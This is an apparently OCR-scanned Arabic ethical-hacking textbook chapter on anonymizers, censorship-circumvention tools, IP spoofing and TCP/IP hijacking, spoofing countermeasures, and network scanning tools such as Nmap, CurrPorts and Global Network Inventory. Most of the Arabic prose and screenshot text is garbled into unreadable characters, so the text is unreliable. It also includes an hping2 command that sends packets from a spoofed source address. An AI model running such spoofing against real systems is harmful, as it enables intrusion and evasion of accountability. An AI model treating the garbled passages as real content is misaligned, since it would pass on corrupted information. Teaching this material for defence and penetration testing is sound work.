c> ^ c> f jIj Anonymizer : (Protect you from online attacks)^">jVI cjIa^a &a diaU* 

l_j <j^aLk]| DSN ^ J^ ^j^V^ J^ JJ^>^^ <-J^ (Jj J 3 ^jj^VI Jc CjIa^JI 

.Anonymizer 
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aJL*A\ jl JjUj : (Bypass IDS and firewall rules) IDSj ^jUaJI J±± ^IjS Jj* uit&Wt - 

.t&Jl <J jj^ jll (jlajjflj V ^31 £Sl ^<J1 cJ L_L>Ua3l jl (J^ila J-<JI ci^ el) - * (J^jl-^l J> diUJaixJl J 1 g a 

jljj^ Jl JL^jVI ^jJ-^ ' J^l ^ c> .Anonymizer 

aJI Jj^ijII ^jjj qf\ J jijj Jl tdL-ajjj Anonymizer f j% ^ .^j^VI J^ Anonymizer 

.csj^l gilj* ji jijj Jl ^ jSlj t Anonymizer J^ J] 
* A ^ i A a a i^i> ul Ij^jI a j£ t^Ld^jjaixJI ^jjtg-I <1jL<^. Jaill L_fljj^j t Anonymizer^ j3-il J^ 

Types of Anonymizers f Ij^i 

CjUUJI jjq-^ <J!>tk ^ LojLojI cJ-**^ .^—^j^^ 4 m ^ djUi^. ^I^jjujI Aic ^jj^a s.li^.1 ^j-<Jl Ig-^A. Anonymizer 

(Networked anonymizers) ^ A 1 < ' ^ ^Jf^ - 
(Single-point anonymizers) S^lj ^ilj 

(Networked anonymizers) ^iLS ^ 

IgJLojjj dijjliV! jj jjj^ll l>« J^lk (j-<i ciL <j^aLk]) diL* jIslxJI Jib V jl (Anonymizers) ^^'^ ^ I^a 

.anonymizers u^?j ^ JU^jI L> ^hl ci? 

s J^U. ^ Vjl ^j^j li^ .requests 1 ^ 3 t . i^ja 

.till A 6 B ' CJ^^ L>^ C5J^^ A^kx^al] Jii ^Iluj t^aij^all ^jj Asu .^3 L_jUi3l (JjS C 6 B 6 A^J^V^ JJJ^^ 

.IjIsla jjj-aII Ja^j bua CjVtufljVi J bSault :Sjj-a]| 

(Single-point anonymizers)S^lj <JaAj ^iau ^ 
.(arms-length communication) ^LduSfl Jjla cjVU-^VI JjS ^> kLal\ cjli cjUj^aJIj IP (jljjp iSj^aJI 

Case: Bloggers Write Text Backwards to Bypass Web Filters in China 

u jj^ > j oh tijlS j ^ j^Vl cjU^i JjU^ ^ j 'Tiananmen 'Democracy 'Tibet lS^ 

<jU^3 J-^l C-H^l ^— J l J^l I j^AaJLujI (JJJ^ > -^1 j ^jjjj jA^Jl ,ClijjljVI a£jjoi A-ii^llI ^dl^>J ^)^^ (jg& o^ 3 ^ '^ JJfi* 

^ V^J U^^^j jLuult ^1 (j^Jl t>» jl C-ilkll Jl (j-aill 
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Psiphon :^J\ <> 5bi 
https://psiphon.ca 

VPN <j^aLaJI 4_jjJaljjaVI A£jjoJI ClAjjjj ~1 I^LujI _Ia jjc.j <- j ua ^ j jfrT.uill 4_ij^3lII <£LuJ|j (jljjjj LjjSj gall JlLd 

^ jiiuj b j jja jl 3-ASj jj^ (j* ajUj!^ j dijjjjyi J j^JI (j* a\\ HTTP Proxy Jj^j^ jj^j SSH Sjj^I Jj^jj jjjj 

<J^j (j* cilli j Cljjljyi (^C- cJ J^^l ^ '^-^ J cJ Jallj 4jI ^^^ic L_fl^xj3l (j^ C5"^"^ lS^^J ^ (J^aLkJl (jjibLai £C^li^)J (J^aC- 

.Caj jSjVI ^ ajI^ stats J 

Your-Freedom <> vj^t Stai 

https ://w ww. your-freedom.net :j^*5l 

^■tl^j ^ (jjiJI (j* ^ (j^al^JI a£jjoJ! (jl jic C5^^ W^'j <iuu31j (j£-a-a <J jll (j£-<uJI jjc. <J*-?^ your-freedom 
J a SOCKS proxy ^^-ajU ^jJaLk jjc. J a ^^joS jjj ;<jlajl3 <»_jJaLk jjc. jj jjj^ll J StaVI .<ja^x-<i 

j] Lft£ U»U»J CljjijVLj ^L^lxi ^^ic (Jj^^j (jl (j^J t&jl (^5^- 'c^^ *^ ^ tajj 6<iL <j^aLaJI Cjlknialll <Jjfi (jxi 4^I^JjujI (j^-dJ ^^1 

. JjS JL^jI jl jjLJI jj6 DSL f v^nn ^ 



Static Sfr^sras ftcwiinrf^nriiig 



irour Freed Dm 



-i>rs r.'n^^ajFfi 'j^iirinfir^ /,pp:i^rnir*i s 



= ■__ 

- :■=:• r - . 

"3pG« "5Tir3 YrtL 
9 l&£ r to tod 



5»nd r^lc ( ST*es.Jsep 



^■sctfcrt rat* ^bplsi.i'EfrZj 



httliijVei-ri^ j'i jC-ui-T-jwCOtiCj I-:3 



UK J iiKl ^-ar»gacm 



2373 
~: 1 





(jU dVUl^l i^IUa jli ctilxi JL^il pliil connection time-out j^^ lP 3 ^ "<0^ u^" ^) 

sj cA-iii> ^ll CijjljVI a£jjoi ^^Ic (j^^jjaixJI JjS (j>i L^jII J jll (jS-<^ xyz.com ^ ^ j-^^ taj La Ai^>x-<J .D^la^. ^ j>JI 



. WebsitePulsej just ping 



j! j^I ^1 



JjujI 
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Just ping 

http://cloudmonitor.ca.com/en/ping.php 
Ping ^ j& .f^-*-^ p-IajI ^-i^ 3 qVi^ a ^al Ping <J**j ^ ^joij ^jJI j dujiiVl <-ajta obi Just ping 



APM Cloud Monitor 



I Contact I O Help English | 




Products Tools 

Check Website Ping DNS Analysis Traceroute 



_LL 



Ping a server or web site using our network of over 30 monitoring stations worldwide 
wwwfacebook.com (e.g. www.yahoo.com) 



IPv6 now supported, 
give it a shot! 



Ping to: www.facebook.com 



Checkpoint 


Result 


min. rtt 


avg. rtt 


max. 
rtt 


IP 


Orlando, U.S.A. (usorlOl): 


Packets lost (100%) 








2a03:2880:2110:9f07:face:b00c::1 


Stockholm, Sweden 
(sestoO-1): 


Okay 


117.5 


1177 


118.0 


2a03 2880:2130:cf05:face:b00c::1 


Santa Clara. U.S.A. 
(ussczOI): 


Unknown result from ping 








2a03:2880:2110:3f07:face:b00c::1 


London. United Kingdom 
(gblonOI): 


Okay 


104.0 


104 4 


105.3 


2a03:2880:2110:9f07:face:b00c::1 


Madrid. Spain (esmadOl): 


Unknown result from ping 








2a03:2880:2050:3f07:face:b00c::1 


Padova. Italy (itpdaOl): 


Okay 


122.0 


122.3 


122.6 


2a03:2880:2130:cf05:face:b00c::1 


Singapore. Singapore 
(sgsinOI): 


Unknown result from ping 








2a03:2880:20:3f07:face:b00c::1 


Cologne. Germany (decgnOI): 


Okay 


101.4 


102.0 


104.9 


2a03:2880:2110:3f07:face:b00c::1 















Website Monitoring 
Plans 

Learn More 
Compare Plans 
Product Features 
Monitoring Stations 
Public Status 



WebsitePulse - 

http ://www. websitepulse.com 
.fJUl! cUjI j^iij .axj ^ 1^ jll CjU^k ^SL WebsitePulse 



rVebS/fePi/fse 



2£M I 
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G-ZAPPER 

http ://www.dummysof tware.com : j^-a-JI 
^ajL Ujliti .CiijljVI cii^JI ^UjI <J j^-^o s-iyi ^^ic til^cLoajj 4 jj£ j£ ^joixJ 4 jj£ j£ stal G-Zapper 

^bj^ ; jjjk-S] ^j^j jjSjU -4 s .ME/NT/2000/XP/VistaAVindows7/98/95 Jj^j f ^ > 

.lsj^VI Google £A-^j <Adsense 'Gmail &\J±* j&j t^jajii 

t^lc JaxjJalU j£j tCllliiall 4)\aC* (Ja s-l^ljVl ^«Jj '""/"^ 4)\a* } ^aLiJl Wizard ^W*^ <J^-^ OJ- ( (* "1 

G-Zapper^TRlAL VERSION 



What is G-Zappep 



G-Zapper - Rf ejecting you Search Privacy 



Did vol j know - Google stores a unique identifier in a cookie on yom PC, which alow; Ihem lo (rack Ire 
keywords you search for. G-Zappei wfl automatical^ delect and clean tints cookie in your web browser. 
J ust nun G-Zappei, rwinze the window, and enioy yorjr enhanced search privacy 



a* | AGoogle Tracking ID eaiisl* cm you FC_ 

YourGoogde ID 6Mb4d9i"«5c60cc1 

Google insldletl the cookie or '<7e H'-eaeJay . September 05. 2012 01 54 46 AM 
Your searches have been Ijacked lor 1 3 hour* 

] No Google searches found m Internet Explorer or Rrefox. 



How to Use It 



To delete the Google cookie cfrck the Delete Cookie button. 

Your identity wM be obstued ham previous searches and G-Zapper Feoulaf^ clean hjture cookies. 
To restore the Google search cookie dick ihe Restore Cookie- button 



I '"- • "■ d'.4ri ; /i^-QitL.var^.con- . 



e j ^Restore Cookie Test Google"^ Settings 



Register 



aIL* j j£ cJ^j^ djUL t_fli^ tSUi .Delete Cookie ^» > ^L j ^ j£ J^j-^ cjUL cJi^J -2 

<JLoj j jj^ij j^j^ cjUL ^3!^ c*Ui .Block Cookie ^ ^ > j^j^ cjUL ^^liJ -3 

.Yes -SaiujJU ^jiia cilli ^£U3 

.Test Google ^ ^» > ^ j^j^ J^j^ ci^ ^ ^ <Ja j^Vj -4 

.View log f3 Setting (ij^ t*Ui l^iia. ^ ^1 J^j^ -5 

ANONYMIZER 

till ^jjj I^jV i( j^aLk]| cillal uii j t^j^j jl L_iisu ^jj^ ^il j-<JI ^ (j^l^JI IP (jl j^c cill ^joij sbl c _^a Anonyiiiizer 

5J j^aij <^H<i ^ ^1 Anonymizer ^^ j .^^^ djU^lcVI ^ dujjjVI jjh^ a\\ (j a\\ J jj^a jit 

Mowser available at http ://www.mo wser.com 

Anonymous Web Surfing Tool available at http ://www.anonymous-surf ing.com 
Hide Your IP Address available at http ://www.hidey ouripaddress.net 
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Anonymizer Universal available at http ://www.anonymizer.com 
Guardster available at http ://www.guardster.com 
Spotflux available at http ://www.spotflux.com 
U-Surf available at http ://ultimate-anony mity .com 
Hope Proxy available at http ://www.hopeproxy .com 

:TCP/IP HIJACKING ATTACK))TCP/IP J* j^JI f J** 

AjauJaH jjj JL^ajl 4^A± ^^Ic ^^biaj^U (spoofed packets) v^ l ^ yA\ ^Vnnj l_j jLJ y> TCP/IP ji^Jl ? 
j(spoofing)^ >jV1 Jj^jjjjj £ha> ^^£5 ^JlJ J£Ju :ul*j ^ . (host machine)^^Jl j 

aAxJ 4ju[£ ^l^kJl CjU^A .^llulVl ^\ 3JLoJJ JjuIJJ JjoJ^JI J-g^ ^ 

c^jIS di^ j^VI <^ jjixJI -Unix) Jj* 

.(IP spoofing -DNS spoofing -ARP spoofing) yr* 

Spoofing IP address -1 

jli toiA ^l^kli ^1 ^ . jkuoll ^j^a Jla CjU^JI ^j^j ^l^kJI CjU^a ^jj ^ Spoofing IP addresses 

q\A O j^. ^a jjiC. <jl jJC <jL^2j| Aic , <J^21a]| q\ J^xl\ ^\ cJ^j] ^ J -fO^ 6 ^ L_llla ^^Sc ^jIj ^>^.V1 L_fl^Jl L_flJjJaxJl 

4l$* ^l^ijl JaxJI jl^JI t-flajjj/^jlxj ^ (non-existent system) '^y^j^ (*^-^^ ^ Jh < ^ > ^i^ l 

IP spoofing using Hping2: 



#Hping2©www.cretifiedhacker.com©-a©7.7.7.7 



a A±j£l\ uL*±a ^1 ls Ljou TCP / IP f > Jtuu jj ^Luuj jp ^1^1 LiH dlLoj Hping2 ^t^o^W 




Ill 



(Direct TTL Probes)»^M TTL cjlLSaJ ;IP spoofing cP ua^l cjUSi 

,<J j£ (jjoii (j-<i Ul£ lil TTL uj-^ < — * ^^^^ ^j^iilt ^jj A>*^Jt TTL ^ ^ 15-^-^ j^ll ^TTL 

cjVU^j! .buUi VhViJ jjSj aJ jVl TTL ^ t> ^ ^Vim^t J j£ jjjjJt J! bUl^l < allkj J jVl TTL ^ 4t*Ui ^ j 
ja jjll jl£ lit 255j 128 ^ TTL ^ ICMP JAwjJj 128j 64 ^ ^ j^Vl aJjVITTL ^ <TCP/UDP 

A_*j3 (j^^ 3 hop V w * clA^ . a Laalalt CP" L * a '* < ^ <^*^\ llOp <J (jj^jlt ciLlc ( . 1^J3 flll^a <J j£ 

^ ^Jll A»>Jt ^ ^ jJI TTL ^ ^J 1 TTL cJ6 ^\ .J jVl TTL <-*S <> ^Jt ^ s^jJI TTL 

AjU-13 <J$juJ! UJ-^ ^ a ^AjJa^iH j jAj^xall q±i (HOP) jmII ^— fl^>*J g a\\ <jl£ tit ^KTu Ugi tit tig-La (jS^jJt 




Sending d packet with 
spoofed 10.0.0.5 IP - TTL J 3 



Attacker 



(Spooled Address 



AjJjuj (JjSj jliikVt ti& ^jIjj (jli t^JL^Jt aifc L>^ UJ*'^ <S ^ 





Target 



y 



•M' 



A* 



10.0.0.5 



(IP Identification Number) IP <^jj*^t ^bjj :IP spoofing 6^ j-^jj cA^Sa 

oj>A JLojjI ^»JJ D^a ^3 ^JJJ (_$i3l IP <_>Jj ^fl (ID IP) tsfij*^' f^jll bl Yiml ^J^>J (j^aj 

(JLaijU j»2 j»l Ajijjii^ <Lo_^aJI b) La Ij^Jkj] .<JC jail A^AuJI (JjiSJ ( _ 5 Jc <ja ■ iallj A^Uj (j^ <J^ (jj-^J LaAic. yji 5Jls<i <aj^)la]l 

"Laja. db-qj] tl^ia jjiajll ^»JJ A^aj^A\ £y> * ajflll ll±jl£ b! .-^1 ^ IP ID elcl^a j i_a^Jl (jjiajll "Laja. 




Send pnehet with ^poofpd IP 
10.0,0.5; IP ID 258G 





Attacker 

(Spoofed Address 
10.0.0.5) 




a- 



.^V* Target 



10.0.0,5 



(TCP Flow Control Method)TCP jiJS ^311 J> ;IP spoofing 6& uiJaM 

~ JslI A-Ld jjt j^Jt .l^J A > <al \\ Aj-g jjt j^Jt (Jj^a (jc (Jj^LuiaH j Jjuj^Jt £yz J£ ^^ic ^a^ilt ^Vilt ^jjjua^J \ $ j£ TCP 

(windows siz(?) ^isUll iji^ (^^ic l^j ^£^j3t (j^j IP ^_>^ c3^^ .^3^^ SiaUll qJu^\ ^a^iilt ^£^j3U 

CjULJt ^ (jlxui j^a j^tj C5 itLJt JjS L^jIc JjA^Jt ^t djUUJt ^ j^a jj£t JIaj JSaJ! tiA . TCPu^' J 
^jj UAio .djUUJt (jflis ^ ^aalt U^Loij JSaJ! tiA jli t^UlUj .(Acknowledgement) jlj^V' uj^ u' <iuj><Jt 
.djUUJt ^ ^3^^ J^j] J^>^^ j' s- 1 ^ t jL^alt ^t (windows size)J^*i\ u^*^ 
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. (initial windows s/ze) JjVl J-^VI iilU jl j cjLUJ! JLo> jj ^ ^jjj ji < jitill J ^Sa^It 

4_i^jJa3! Jj]j jij _< ; i^jJa3l CjUUJI cJ^jj J j.<u.>.>Lj jUaVI a ^jc CjLg jl*-* Jc- ACK ^3^- <-W^ (J? '^ $ ^ 

J^;^ ( o,*<Uj ^Ja^ill J ^£^j3I <L Ja 4_Jlxi3 m A L^jIq 4^*3^" cW-*^ U' ( ; lij taiaUll a ^ jLi. CAjLJl ^3^" 

JjuAjujj ^Sj JjI^jIU o^Axlxi ^ j^j pLb L_i»_j^a3l ^ <j| La£ t (handshake)** ^ ^ > ^> a\\ *uL&c J^lk <JjL^j3L a-s&W ^ cj^j 

JLL. SYN c> J^^u^ li] ^ -ACK JL- jj SYN-ACK JjV» SYN > 

Jjuj^JI q\ j*j t*lli jli tCjUUj J\ ACK J^jj J^>«JI I^J . j**-^ SYN-ACK s-^ ^L? c> j' 
^jjjJ (j^lj ACK ^3^ J^j-^ Jc- ( ; t ji^all Jj SYN-ACK u^*^ ^ ^ , ^ c * 1^ jJIslxJI 

ACK 



SendinE a SYN packet "^V 
- | with spoofed 10,0, 0,5 IP J 

4* a cy- 




Attacker ^ Target 

(Spoofed Address a+^'i*^ 




10-0.0.5 

:(IP Spoofing Countermeasures) IP spoofing J2 cjULaaJI 

IgjUJJ ill J^C. AjflLjaj ^alg_x» pbl 4_ilc ( . L^J t(Pen test) c3l3^^^ j;*^ a ^jJii Uiajl L^j^stxJl J^kVI j£lg-lt 4_L^aja3l J 

IP SpOOfing J^i L£ .J^aJI iL^aljill ^ ^Jjl oaJ ^J^l JJjI^all iLkjL dlx^ lij Vj lg-S <ajS V 4£jj^3I J AjlftVl djl^iiill 

ll^iifki ^ji^j Jll IP ^l^kJ SjLjaJt J^l^ill 4> ^ J <^Lk]i A<iU*\\ (jJ dibl^V IP SpOOfing a^Lu^o J^I^J 

Avoid trust relationships ^1 £i&Ul\ -\ 

^jj ^3^1 ^>^^ l5^^ L>^ (*3^^ lij ,til3 AlmkJl ^3^" J^jjj (Jj^ c fl-ijJa^ ^joiijl jLaajl UJ^>^ (S A ^ ^Aa^LujJ 

^.1 ^j-d J^ ^^liil ^3^^ (jmVim^l ^j-d 6 jLilLj ,<jL^VI cJj^aaJ ^3 tl^J ^jjJ j-g ciL ^aLiJl L_flJjJaxJl JjS ^j-<i IgJL o jj 

Use firewalls and filtering mechanisms £^J^ £)\j**l\ ^(^1^1 -2 

<Ldjta3l AjJ±aJi ^3^^ *^J^ ^3^ UJ^ ^ ^ m^ti CliLi Jx-<JI (jl^ j CjLa^JI ( . oj^L^ll j jll ^3^^ ^J^> Ajjj^aJ ( . la>J 

Jl AjJfaJl ^3^^ <J J^"^ CS-^ C5^J^ ^ cAjLcl^JI jl^a. *^J^ jll ^3^^ ^Lii^aJ djLill ^ ^ jj ^1 ^Viml V du£ lij 
J ,<J ^ jj^aII pistil J jj^ jll ^1<J (ACLs) <J j3 ^1 I^LujI <Lj SjLuA t . ujujj (j| (j£^jj tiL <j^aLaJl (JL^jVI 

^ .cdljudfll L<J ciL ^aLkJ! (JLgcV! (jc <jujL CjLq jl*-* I jlwJJJ ^ ^jj^^l g ^11 .lJ^I^I L>^ UJ^^^ <S ^j'^^j Ljajl c^IUa ;<jaiij dlS jll 

J ^.l^xJI '^ c ' ^3^^ ojjin^ Ljajl cilLiA ,LLjak3l Ia jjc. jl (jl^a Jj Lj^jI 11a 

https://www.facebook.com/tibea2004 ^uJa ^^aa^a 
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^^J| ^a^il (Jj^ «a*J ^j) < . la>J Ji3 /aj^L^ll (»3^ <j!)tk (j-a t U' U^** . J^*^} eUa&l (jj^ ^ig-xJl Jl 

.o^jl jll ^»3^ U °^ ^ S J^ 1 ** Dj^L^all 

Use random initial sequence numbers ^t^^t J mlnnU ^SjVt ?&Ji\ ^ l^ll^l -3 

i> <j jiiill ISNs J*^ ^ .(timed counters) < r^UJl ££j\\ J &h\i*l\ qAJ\ Jl& ISN 
JL^iVI J i jj^ll ISN c> TCP Jl^^U ISN .ISN jh j*** ^ lW 

li* t . ua^l ,c*L <j^aUJ> 4£jJ^I JjJ* 5jSI J f^LaJl J) ^in^ jL^ajl *lj^l (j£*J <li <ISN Jf^ -gr^^ 

Ingress filtering JiUl A-iL^j -4 

n J l jj>JI j^. (3^j(router) j^l * j^l j Jjo^j Jll j(router) j^l * j$^> ^ J j^l 

(jUaill ^J^> Jl (jl Jalimj <J-GJU ^31 (ACLs) (J J^-} ^jI jfj ^I^JjojI j jl^cl .6^J^C (J^>iaJ lA^jjjJ 

Egress filtering ^jj^l -5 
Use encryption j^iiJ) ^iJilyil -6 

jixkll (jia^xJJ (jl (j^J (^l ^I^VI Jjils<-!l QlA^l^ll ^ .IP SpOOfing CjUl^J (J^ JjJafll liA j-<» j <C jj ^l 

^U^al ^ ^l^xJI ^Ijl lil udj 

a i^JLujI ,4£jjaJ! ^L^iaV c5^>^^ C-iLijij laJLujI cJj^-^ ^ jl j& * >1 J (jia^suj (jl (j^j ^>^.l c _ 5 ic jj^ix-SI Jj^-^ ^ $ ^ u!^ 

(SYN flooding countermeasures) SYN^^^J SjU^I -7 
.IP spoofing ^ ^ ; uaj til^cLojj (jl Uiajl (j^j SYN flooding ^ s^Lja^ j^lull 

[IP spoofing ^-j^^A t ; C _^L La Aiijj .qj tAjjojLojVI o^LjaxJI j^l^ill L-uLa. ^1 

jl^A ^^Jc ^l^cVI djLd jls^ ^1 J jj^a jll ^AaJ 
ping >^^jVI J^axJ 

TCP / IP^UIL J TTL Jj^ 0^ - 

_CllLafIa3l SJ^jLLq 4_jU^J| ^jlj^a. a I iklLujI 

ARP spoofing -2 
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SCANNING PEN TESTING 3.8 



. jblkVI <JUi jlfi^V l^lul M^' ^ jU^tt j J) jlkVI Jfi^ ^-a^i 4j^UJ| 

SCANNING PEN TESTING Jb^VI 

jjL<J| ialixJI L_flLau£l tA-i^JI ^Jaill -^-^j lS^^ 3 CP" lS^^VI a£jjoJ (j-aV! ^-^aj ^3^^ c^c- ^I^Ijujj Jjl jlkVI j;*^ o Cy* o^^^l 
jUlkl jl (j-^^i t .a£jJo3I (jljlkl jl^*3 '^}*j ^ grabbing system banners j ^aii^Jl dl^ai! j 

(<J ^ VgT JJJ 1 u ifl^a ^3 (jSj ^3 lit) *La>iaJLuid (jp^-j 

.banners u ^J * ^ jt 

a JJ^I J jJ3 ^jia^a] ^Uaill 4_jU^JI jl^ Sjjlsua 



'Nmap 'Angry IP Scanner aIjj^JI (j-aai CjI j^I ^l^klujU t*Ui j tAi^loiJI 4£fxi3l ^ ^ ^<JI j jqj^^ l ^1 t (s? ^JI 

_4_jU^J1 c Lff ^l\ c Luiaxll ^jc c Lu^ll L-ixj^ali ^ _^c3j ^NetScan 

.^j 'Net tools 'PRTG Network monitor 'NetScan tool pro <Nmap ^1 ^l^i^U £Aj jjJl/iaUJl ^-a^i ijiii 

(OS Finger printing) J^iUt ^UaS j! Banner Grabbing :3 Sj^l 
liA j ^Netcat 'ID Serve 'NetCraft < TelnetcS^ ^Ij^i ^l^i^U OS Finger printing jl Banner Grabbing ^1^ 

'SAINT 'GFI LanGuard 'Nessus <^i3! < aajjall Jalij L >^^i djljj ^1 ikl^L < aajjall Jalij ^I^jV a£^SI o-^^i <iLc; 
u^JI Jalij ^ jjkJ! ^ ^L^j Cj! jjVi ^ .^]] 4 OpenVAS'MBSA 'Ratina CS 'Core Impact Professional 
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cjU jll t Friendly Pinger <LANState 'OpManager 'LAN surveyor ^->1 j^Vl <> ^ ^jjj ^j^j 

:6 S^laaJt 4- 

£l] <ProxyFinder <Gproxy <+Proxy 'SSL Proxy 'SocksChain < ProxifierJ^ ^l^i^U ^.^jjJI 



Monitoring TCP/IP Connections Using the CurrPorts Tool 

http://www.nirsoft.net/utils/cports.html 
o'±& . C5 1^a1I Jig a li jjLJI UDP TCP *l ia^l o- 3 ^ ^^j^ CurrPorts 

jl ciujjj cjUIac ^1 < . liLajj Vj liiiill (JjIS Jiiui^ (Jjflaj CurrPorts ^bVl . J^«-^^ ^*l^ ^ Netcat ^3j:^ ,; ^ J^Uj sl^VI 

.(Dynamic Link Library) DLLs 

aJL5A\ j^ki lJj^j o jj^j cports.exe c3j^ W-j^ ' CurrPorts l!^-^ -1 

-L> AiJ ^Uaj ^ netstat 

ffi CurrPorts I « f| (S> |« » I 
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L^ia <!^joii<JI 4^j\i3l VIEW j^-^j ij jis^l CjI j^Vl -iajj^ c> ^ clA^ HTML ^ j^j^ 6 ^ ^jj^ -3 

HTML Reports All Items 
jtikj 4jj1sl!I *L<ijlfl3l ^ djl -lajjj^i CjLg jl*.* ^jjii ^iLill (^Ic ^ u^*^ j^*-* ~4 

.Properties U-^ ^jlill File 

0- JL-aSi jlil cillij Close Selected TCP Connections(Ctrl+T) 1^1 ^3 ^ ^ ^ -5 

.^^J! ialdl) ^ TCP £ JH 

iiiJI ^ 4_iLc J\ jl*] fcdii j Kill Process Of Selected Ports ^4 ^ ^ <> -6 



File Edit View Options Help 


IPNetlnfo 


Ctrkl 




Close Selected TCP Connections 
Kill Processes Of Selected Ports 


CtrkT 


ocal Por... 


Local Address 


Remote 


Remote ... 


Remote Address 


Remote Host Name 


State 


Process Path 






127.0.0.1 


14289 




127.0.0.1 


JANA-TEBA 


Established 


C:\Program Files (x86)\Mozilla Firefox\firefox.exe 


Save Selected Items 


CtrkS 




127.0.0.1 


14288 




127.0.0.1 


JANA-TEBA 


Established 


C:\Program Files (x86)\Mozilla Firefox\firefox.exe 


Properties 


Alt+ Enter 




127.0.0.1 






0.0.0.0 




Listening 


C:\Program Files (x86)\Mozilla Firefox\firefox.exe 


Process Properties 


Ctrl+P 




127.0.0.1 
127.0.0.1 


14292 
14291 




127.0.0.1 
127.0.0.1 


JANA-TEBA 
JANA-TEBA 


Established 
Established 


C:\Program Files (x86)\Mozilla Firefox\firefox.exe 
C:\Program Files (x86)\Mozilla Firefox\firefox.exe 
C:\Program Files (x86)\Mozilla Firefox\firefox.exe 


Log Changes 
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Established 


Open Log File 
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443 
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Established 


C:\Program Files (x86)\Mozilla Firefox\firefox.exe 


Clear Log File 
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Established 
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Exit 
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192.168.50.1 
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Listening 




O System 4756 TCP 


554 rtsp 


0.0.0.0 






0.0.0.0 




Listening 





,\_L<uil ^jja j& Lo£ Exit ^ ~7 



Auditing Scanning by using Global Network Inventory 

http ://www.magnetosof tcom/product/global network inventory/features 
l3#^ o-^^ l^i^a jj t^l^ikU (ji^j j&\ s j^VI ^ ^Uaj j j jj j& Global Network Inventory 

<Jb^ '(auditing scanning) <i^^ ^-^US c^ikiJ U lil .zero deploymentj agent-free J^j i> 

J j J: u x ^3l Zj^aS kx+\jA <j^Global Network Inventory .o^ 1 ^ J 1 ^ j^j^^^ * iU£l\ Jj>*JI 

m ^l\ t^jjtj j3I j£l j^j 4a£jJo3I cjlauliaj i switches ^ ^ & tS-iixJ! 

.Global Network Inventory host 4 — aixJi ^ & jj jjj^l l Sj^i ^^jj^ j^ll t^jjjUxJI djlalkj J^Lk ^ oj^VI (j^^^j 

firewall ^1^1 j^^j ^Vl oaailt/jjS^ll c> de facto i> Global Network Inventory 

.Idle Scanning o^aaill aA^c J^UIojI Ljajl ^H^JI j 

^Jalia 4ic d^slxJI jiJl J^-^. ^txilj^Jl (JjxjoUJ ^ jlj ^aJ Ciiiull (j^aLkl! Wizard (* "1 

i^Vl^ oaailt (j-a^VI Wizard <^?J^ c5 





vom car awkftfi ii oompuief ai erv lime ty pwswg 
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Welcome to the New Audit Wizard 



This wizard will guide you through the process of 
new nventory audit 




To continue, click Next 



I^VIS IP cl^j^ ^ASlkj J^U. ^ ^j^i^qllj * jlJ IP range j 4_^LSJI j^ia next -2 



New Audit Wizard 

Audit Scan Mode 

To start a new audi scan you must choose the scenario that best fts how you wi 
be using this scan. 



Single address scan 

Choose this mode t you want to audit a single computer 



• IP range scan 

Choose this mode i you want to audit a group of computers wthn a angle IP range 



Domain scan 

Choose this mode i you want to audit computers that are part of the same doman(s) 
" Host file scan 

Choose th« mode to audt computers specified in the host fie The most common 
scenario is to audt a group of computers without auditing an IP range or a domain 
Export audit agent 

Choose this mode f you want to audit computers using a doman logn senpt 
An audit agent wi be exported to a shared directory. It can later be used n the 
domain loon scnot 

To continue, dek Next. 



< Back | Next | Caned 

*£f£U IP ojjUJI 3^ ls^'j X&J&\ J! ^^jja Next <ij* Jti\j IP range scan J£*>\ 



IP Range Scan 

Specify an IP Range to Audi. 



IP range 



L 10 


0 


0 




To: 


[_J0_ 


0 


0 


5dJ 



To continue, cfcck Not. 



I < Back [ Next | j Caned | 



jUkj l^ia j (authentication) (i^^W<jy^^ o- 3 ^ ^ j Next <ij£ jfclt -4 

^ jjj (djU^^L^all ^-i^ <A\ a) L_jLud^. (Jj^j (jl t i> j) 4-^ mi^j <j^aLk!l ^jj^ajll ^—^-^ (J^-Aj ^li Contact as 

Next c> J^h 
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AJhertiution Settings 

Sweaty the auttwterton settings to u»e to connect to e 



iQfliote computer 




O Connect as ajrentfy logged on u 



• Connect as 
Domain \Utern 

Pflffwond 



To carrtinue. cick foed 



< Back I Hoi > 



.Finish ^* * f* j^j ^ jjsVI cjbl^VI tiljlia Next ^ 4^Ui3l kj -5 



New Audit Wizard 



Complying the New .^udit Wizard 




You are ready to start a new IP range scan 
You can set the following options for this. sca- 
ly] Do not record unavailable nodes 
S Open scan progress dialog whan scan Marts 
Re-scan nodes that have been succei-:- . , ; : • - -=■ z 
Rescan. but no more than once a day " 



To complete this wizard, click Finish 



\j^\S> (process scan) o 3 ^ 1 ^1*=- o^j*^ J^h ^iUill j^ki -6 

n progress 



B 




Name 


Percem 


Tmeskamp 




0 


10.0.0.2 






08/22/1215:36 23 




1 


io.o : : 






i: :: * ,: 1 5 :<iE : ; 




2 


ioo : - 


WIN -U LYS5SKH Q I P 




□8/22/121536:25 




3 


10.0 0 5 






08/22/1215:3623 


= 


4 


10.0.06 


AOMIN -PC 




08/22/12 15:3623 




5 


10.0.0.7 


W1N-039MR5HL9E4 




08/22/1215:3622 




6 


10.0 0 3 






08/22/12153623 
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1i i 0 0.9 






08/22/12153624 




e 


1 D i.'H 1 . 






08/22/1215:36.24 




9 


10 Out 




if? 7 


08/22/12153624 




10 


10.0.012 






08/22/12153624 




11 


10.0.013 






08/22/1215:36:24 




12 


10.0.0 14 




■- 


08/22/1215:36:24 

















1^1 Open this dialog when scan starts 
[yl Close Ihis dialog when scan causes 
|yj Doril display completed t 



Scanned nodes 0/24 



Stop 
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'fjlbbrf PJetworie Inventory - Unregistered 



Scan iqqIs Reports Help 



ic.d.C.7;win dm,., 



Q Pnn*»«oni |^ Nv heard #J> M*im^ Memory < 

V Scar MlM* ^ I | §£] ' rw*hnr. sy*t*nr — Q > . -mm 




. Timcstornp 

,Z_.Hcm1H..I-I| Stabus _zJ | MAC A.. , [^Jj ^oxij - OS Ha 



-;D=mar VOR<GRO_F COUM-21 



FlOL-C-l-lCJ . T CjIii i c-l i. T 



-J IPAdacH : t=ajaa4|DCLNT-1 



- E'nrajUiro: E/22 J 2Q- 2 336:46 PM [CDUHT-1 ] 



Cotp j .. WML LY95Sj S -jpoess 1 00- 1 5 5C ■ JO j v icr-jsjtt CaAvirccwj j styci-"]" 



Ctfuj „ [v/ H-C 33M n| S uccbh' | P 4-BE-D3-C:j Ro^td 



| intern DjicrTM" bci^i. 1 1 



-L>a ^A]| ^^^i* o^^s ls^j Scan summary 
.^j^l <L±*i q± jxj ^jL ^illj BIOS 

